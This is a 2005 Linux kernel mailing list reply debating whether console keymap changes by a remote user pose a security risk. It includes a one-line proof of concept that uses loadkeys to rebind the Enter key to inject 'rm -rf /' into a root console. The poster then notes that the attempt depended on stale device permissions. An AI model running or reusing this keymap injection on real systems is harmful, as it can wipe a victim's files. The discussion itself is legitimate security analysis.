Re: security / kbd

From: Bodo Eggert
Date: Sat Dec 03 2005 - 00:34:40 EST


On Sat, 3 Dec 2005, Andries Brouwer wrote:
> On Sat, Dec 03, 2005 at 03:11:42AM +0100, Bodo Eggert wrote:
> > On Sat, 3 Dec 2005, Andries Brouwer wrote:

> > > Let me repeat what I said and you snipped:
> > > If there is a security problem, then it should be solved in user space.
> >
> > By killing and disabeling all remote logins when root logs in or by
> > ptracing each user program during root sessions? You'd have to do this
> > until we find somebody to do the correct fix in the kernel.
>
> Please describe the perceived security problem.
> I see words, but no problem.

> You log in remotely to my machine. Want to do something evil.
> What precisely do you do?

echo -e 'keycode 28 F70
string F70 ";rm -rf /\x0a"' | loadkeys > /proc/0815/fd/1

where process 0815 is a "sleep 2147483647&"

> 2.0.34% loadkeys -d
> Couldnt get a file descriptor referring to the console

I had stale permissions on /dev/tty0. With correct permission settings,
you'll need a session belonging to the malicious user.

--
'Calm down -- it's only ones and zeros.'
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@xxxxxxxxxxxxxxx
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/